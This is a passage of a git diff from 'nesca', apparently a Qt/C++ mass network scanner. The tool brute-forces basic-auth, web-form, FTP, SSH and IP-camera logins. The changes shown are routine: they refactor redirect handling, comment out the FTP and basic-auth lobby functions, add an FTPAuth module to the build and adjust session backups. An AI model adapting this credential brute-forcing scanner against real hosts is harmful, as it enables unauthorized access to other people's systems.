ip, port, linkPtr, l, ps, redirStrLst, rBuff); + redirectReconnect(ps->cookie, ip, port, linkPtr, l, ps, redirStrLst); }; }; delete []scriptContainer; @@ -2506,7 +2347,7 @@ int Lexems::_header(char *ip, int port, const char str[], Lexems *l, PathStr *ps if(std::find(redirStrLst->begin(), redirStrLst->end(), redirectStr) == redirStrLst->end()) { redirStrLst->push_back(redirectStr); - return redirectReconnect(ps->cookie, ip, port, linkPtr, l, ps, redirStrLst, rBuff); + return redirectReconnect(ps->cookie, ip, port, linkPtr, l, ps, redirStrLst); } return -1; }; delete []scriptContainer; @@ -2620,7 +2461,7 @@ int Lexems::_header(char *ip, int port, const char str[], Lexems *l, PathStr *ps if(std::find(redirStrLst->begin(), redirStrLst->end(), redirectStr) == redirStrLst->end()) { redirStrLst->push_back(redirectStr); - return redirectReconnect(ps->cookie, ip, port, lol, l, ps, redirStrLst, rBuff); + return redirectReconnect(ps->cookie, ip, port, lol, l, ps, redirStrLst); }; } else @@ -2690,7 +2531,7 @@ int Lexems::_header(char *ip, int port, const char str[], Lexems *l, PathStr *ps if (std::find(redirStrLst->begin(), redirStrLst->end(), redirStr) == redirStrLst->end()) { redirStrLst->push_back(redirStr); - return redirectReconnect(ps->cookie, ip, port, redirStr, l, ps, redirStrLst, rBuff); + return redirectReconnect(ps->cookie, ip, port, redirStr, l, ps, redirStrLst); } return -1; } return -2; diff --git a/mainResources.h b/mainResources.h index ec78631..6311ff2 100644 --- a/mainResources.h +++ b/mainResources.h @@ -131,8 +131,7 @@ class Lexems const char str[], Lexems *l, PathStr *ps, - std::vector *lst, - char *rBuff); + std::vector *lst); int _filler(int p, const char *buffcpy, @@ -148,16 +147,16 @@ class Connector_old public: int _Updater(); - lopaStr _FTPLobby(char *ip, - int port, - PathStr *ps); +// lopaStr _FTPLobby(char *ip, +// int port, +// PathStr *ps); - lopaStr _BALobby(char *cookie, - char *ip, - int port, - char *path, - char *method, - char *data); +// lopaStr _BALobby(char *cookie, +// char *ip, +// int port, +// char *path, +// char *method, +// char *data); lopaStr _WFLobby(char *cookie, char *ip, @@ -185,5 +184,5 @@ class Connector_old extern lopaStr _IPCameraBLobby(char *ip, int port, char *SPEC); -extern lopaStr _BALobby(char *cookie, char *ip, int port, char *path, char *method); -extern lopaStr _FTPLobby(char *ip, int port, PathStr *ps); +//extern lopaStr _BALobby(char *cookie, char *ip, int port, char *path, char *method); +//extern lopaStr _FTPLobby(char *ip, int port, PathStr *ps); diff --git a/msgcheckerthread.cpp b/msgcheckerthread.cpp index 9f71f8c..20edc81 100644 --- a/msgcheckerthread.cpp +++ b/msgcheckerthread.cpp @@ -22,9 +22,9 @@ void _getNewMsg() if(buffer.size() > 0) { if(Utils::ci_find_substr(buffer, std::string("\r\n\r\n")) != -1 - && Utils::ci_find_substr(buffer, std::string("HTTP/1.1 404 Not Found")) == -1 - && Utils::ci_find_substr(buffer, std::string("HTTP/1.1 502 Bad Gateway")) == -1 - && Utils::ci_find_substr(buffer, std::string("HTTP/1.1 400 Bad Request")) == -1 + && Utils::ci_find_substr(buffer, std::string("404 Not Found")) == -1 + && Utils::ci_find_substr(buffer, std::string("502 Bad Gateway")) == -1 + && Utils::ci_find_substr(buffer, std::string("400 Bad Request")) == -1 && Utils::ci_find_substr(buffer, std::string("\r\n\r\nEmpty")) == -1 ) { @@ -41,7 +41,7 @@ void MSGCheckerThread::run() { for(;;) { - Sleep(60000); - _getNewMsg(); + Sleep(60000); + if(strlen(trcPersKey) != 0) _getNewMsg(); }; } diff --git a/nesca.pro b/nesca.pro index 4cb5581..e9cf8bb 100644 --- a/nesca.pro +++ b/nesca.pro @@ -42,7 +42,8 @@ SOURCES +=\ connector_old.cpp \ Utils.cpp \ BruteUtils.cpp \ - BasicAuth.cpp + BasicAuth.cpp \ + FTPAuth.cpp HEADERS += ActivityDrawerTh_HorNet.h \ @@ -71,7 +72,8 @@ HEADERS += ActivityDrawerTh_HorNet.h \ WebformWorker.h \ Connector.h \ BasicAuth.h \ - BruteUtils.h + BruteUtils.h \ + FTPAuth.h FORMS += nesca_3.ui diff --git a/nesca_3.cpp b/nesca_3.cpp index 1574eca..248b81d 100644 --- a/nesca_3.cpp +++ b/nesca_3.cpp @@ -739,7 +739,6 @@ void nesca_3::slotAddLine(int x1, int y1, int x2, int y2) }; } - void nesca_3::slotAddPolyLine() { if(ME2ScanFlag) @@ -2216,6 +2215,7 @@ void nesca_3::slotOutData(QString str) str.replace("Content-Length:", "Content-Length:"); str.replace("Authorization:", "Authorization:"); str.replace("X-Nescav3:", "X-Nescav3:"); + str.replace("Referer:", "Referer:"); _rOutProt.indexIn(str); prot = _rOutProt.cap(0); @@ -2241,7 +2241,7 @@ QRegExp _rIncRN("\r\n(_|-|=|.*)*:"); void nesca_3::slotIncData(QString ip, QString str) { if(RecvData != NULL) - { + { QStringList headNbody = str.split("\r\n\r\n"); QString tStr; QString tagRes; @@ -2540,8 +2540,7 @@ void nesca_3::IPScanSeq() if(ui->portLine->text() != "") { ui->labelParsed_Value->setText("0/0"); - stopFirst = false; - saveOptions(); + stopFirst = false; ui->tabMainWidget->setTabEnabled(1, false); ui->tabMainWidget->setTabEnabled(2, false); @@ -2637,8 +2636,7 @@ void nesca_3::DNSScanSeq() ui->lineILVL->setText(topLevelDomainStr); }; - stopFirst = false; - saveOptions(); + stopFirst = false; ui->tabMainWidget->setTabEnabled(0, false); ui->tabMainWidget->setTabEnabled(2, false); diff --git a/nesca_startModule.cpp b/nesca_startModule.cpp index 5e889ee..cecd075 100644 --- a/nesca_startModule.cpp +++ b/nesca_startModule.cpp @@ -26,7 +26,6 @@ int ipCounter = 0; int mode; int found = 0, indexIP = 1; int gMode; -int isActive = 0; int MaxPass = 0, MaxLogin = 0, MaxTags = 0, MaxWFLogin = 0, MaxWFPass = 0, MaxSSHPass = 0; int ipsstart[4], ipsend[4], overallPorts, flCounter, octet[4]; @@ -187,7 +186,7 @@ void _SaveBackupToFile() } else { - if(strstr(endIP2, "-") != NULL) strcpy(endStr, strstr(endIP2, "-")); + if(strstr(endIP2, "-") != NULL) strcpy(endStr, endIP2);//strcpy(endStr, strstr(endIP2, "-")); else if(strstr(endIP2, "/") != NULL) strcpy(endStr, strstr(endIP2, "/")); else { @@ -203,8 +202,7 @@ void _SaveBackupToFile() { strcpy(saveStr, "[SESSION]:"); strcat(saveStr, std::to_string(gMode).c_str()); - strcat(saveStr, " "); - if(gMode == 0) strcat(saveStr, saveStartIP); + strcat(saveStr, " "); strcat(saveStr, endStr); if(gMode == 1) { @@ -2602,8 +2600,7 @@ stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads)); { if (flCounter == 0) { - stt->doEmitionRedFoundData("Empty IP list."); - isActive = 0; + stt->doEmitionRedFoundData("Empty IP list."); globalScanFlag = false; stt->doEmitionKillSttThread(); @@ -2747,7 +2744,7 @@ stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads)); stt->doEmitionChangeStatus("Stopping..."); - while(cons > 0 || isActive == 1 || jsonArr->size() > 0) { + while(cons > 0 || jsonArr->size() > 0) { Sleep(2000); };